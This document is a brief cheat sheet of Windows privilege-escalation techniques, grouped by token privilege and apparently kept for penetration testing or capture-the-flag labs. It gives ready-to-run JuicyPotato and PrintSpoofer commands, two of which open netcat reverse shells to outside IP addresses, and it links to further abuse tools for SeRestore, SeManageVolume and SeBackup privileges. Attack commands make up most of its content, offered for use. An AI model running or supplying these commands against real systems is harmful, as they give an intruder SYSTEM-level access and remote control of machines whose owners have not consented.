Privilege Exploits

• Most of this can be found here: https://github.com/gtworek/Priv2Admin

SeImpersonate

• JuicyPotato - Older systems pre 1909 Win10

JuicyPotato.exe -l 1337 -c "{8BC3F05E-D86B-11D0-A075-00C04FB68820}" -p C:\Users\Destitute\AppData\Local\Temp\cmd.exe -a "/c C:\Users\Destitute\AppData\Local\Temp\nc.exe -e cmd.exe 10.10.14.5 9998" -t *

• PrintSpoofer - Newer systems

PrintSpoofer.exe -i -c cmd

PrintSpoofer.exe -c "C:\TOOLS\nc.exe 10.10.13.37 1337 -e cmd"

SeRestorePrivilege

• https://github.com/xct/SeRestoreAbuse

• /root/SeRestoreAbuse.exe (x64 version)

• Usage:

SeRestoreAbuse.exe "cmd /c ..."

SeManageVolumeAbuse

• https://github.com/xct/SeManageVolumeAbuse

SeBackupPrivilege

• https://github.com/xct/SeBackupPrivilege

• https://www.hackingarticles.in/windows-privilege-escalation-sebackupprivilege/